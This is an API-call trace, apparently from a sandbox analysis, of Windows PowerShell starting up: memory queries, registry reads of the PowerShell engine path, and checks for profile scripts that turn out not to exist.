	[0304.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.941] CoTaskMemFree (pv=0x3298d0) 
	[0304.941] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0304.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.941] CoTaskMemFree (pv=0x3298d0) 
	[0304.942] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.946] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.034] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.037] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0306.037] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.037] CoTaskMemFree (pv=0x3298d0) 
	[0306.968] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x329d10
	[0306.968] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x329e20
	[0309.211] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0309.810] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0309.813] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0309.814] VirtualQuery (in: lpAddress=0x1aa260, lpBuffer=0x1ab120, dwLength=0x30 | out: lpBuffer=0x1ab120*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.416] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.416] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.416] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.417] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.417] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.417] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.417] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.417] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.417] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.417] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.417] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.417] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.417] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.418] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.418] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.418] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.418] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.418] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.418] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.418] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.418] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.418] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.418] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.418] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.419] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.419] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.419] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.419] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.419] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.420] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0310.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.420] CoTaskMemFree (pv=0x329f30) 
	[0310.422] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0310.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.422] CoTaskMemFree (pv=0x329f30) 
	[0310.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0310.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0310.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0310.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0311.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0311.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0311.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0311.008] VirtualQuery (in: lpAddress=0x1abac0, lpBuffer=0x1ac980, dwLength=0x30 | out: lpBuffer=0x1ac980*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0311.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0311.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0311.014] VirtualQuery (in: lpAddress=0x1abac0, lpBuffer=0x1ac980, dwLength=0x30 | out: lpBuffer=0x1ac980*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.014] VirtualQuery (in: lpAddress=0x1ab310, lpBuffer=0x1ac1d0, dwLength=0x30 | out: lpBuffer=0x1ac1d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.014] VirtualQuery (in: lpAddress=0x1ab310, lpBuffer=0x1ac1d0, dwLength=0x30 | out: lpBuffer=0x1ac1d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.015] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad918 | out: phkResult=0x1ad918*=0x2e0) returned 0x0
	[0311.015] RegQueryValueExW (in: hKey=0x2e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad89c, lpData=0x0, lpcbData=0x1ad898*=0x0 | out: lpType=0x1ad89c*=0x1, lpData=0x0, lpcbData=0x1ad898*=0x56) returned 0x0
	[0311.015] CoTaskMemAlloc (cb=0x5a) returned 0x1b7035c0
	[0311.015] RegQueryValueExW (in: hKey=0x2e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad86c, lpData=0x1b7035c0, lpcbData=0x1ad868*=0x56 | out: lpType=0x1ad86c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad868*=0x56) returned 0x0
	[0311.015] CoTaskMemFree (pv=0x1b7035c0) 
	[0311.015] RegCloseKey (hKey=0x2e0) returned 0x0
	[0311.016] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad918 | out: phkResult=0x1ad918*=0x2e0) returned 0x0
	[0311.016] RegQueryValueExW (in: hKey=0x2e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad89c, lpData=0x0, lpcbData=0x1ad898*=0x0 | out: lpType=0x1ad89c*=0x1, lpData=0x0, lpcbData=0x1ad898*=0x56) returned 0x0
	[0311.016] CoTaskMemAlloc (cb=0x5a) returned 0x1b7035c0
	[0311.016] RegQueryValueExW (in: hKey=0x2e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad86c, lpData=0x1b7035c0, lpcbData=0x1ad868*=0x56 | out: lpType=0x1ad86c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad868*=0x56) returned 0x0
	[0311.016] CoTaskMemFree (pv=0x1b7035c0) 
	[0311.016] RegCloseKey (hKey=0x2e0) returned 0x0
	[0311.017] CoTaskMemAlloc (cb=0x20c) returned 0x1b6f0d00
	[0311.017] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b6f0d00 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0311.017] CoTaskMemFree (pv=0x1b6f0d00) 
	[0311.017] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0311.017] CoTaskMemAlloc (cb=0x20c) returned 0x1b6f0d00
	[0311.017] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b6f0d00 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0311.017] CoTaskMemFree (pv=0x1b6f0d00) 
	[0311.017] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0311.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0311.018] SetErrorMode (uMode=0x1) returned 0x1
	[0311.018] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad880 | out: lpFileInformation=0x1ad880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0311.018] SetErrorMode (uMode=0x1) returned 0x1
	[0311.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0311.018] SetErrorMode (uMode=0x1) returned 0x1
	[0311.019] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad880 | out: lpFileInformation=0x1ad880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0311.019] SetErrorMode (uMode=0x1) returned 0x1
	[0311.019] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0311.019] SetErrorMode (uMode=0x1) returned 0x1
	[0311.019] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad880 | out: lpFileInformation=0x1ad880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0311.019] SetErrorMode (uMode=0x1) returned 0x1
	[0311.019] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0311.019] SetErrorMode (uMode=0x1) returned 0x1
	[0311.019] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad880 | out: lpFileInformation=0x1ad880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0311.019] SetErrorMode (uMode=0x1) returned 0x1
	[0311.020] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0311.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.020] CoTaskMemFree (pv=0x329f30) 
	[0311.021] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0311.021] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.021] CoTaskMemFree (pv=0x329f30) 
	[0311.545] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0311.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.545] CoTaskMemFree (pv=0x329f30) 
	[0311.546] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0311.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.546] CoTaskMemFree (pv=0x329f30) 
	[0311.550] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0311.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.550] CoTaskMemFree (pv=0x329f30) 
	[0311.551] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e0
	[0311.551] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x374
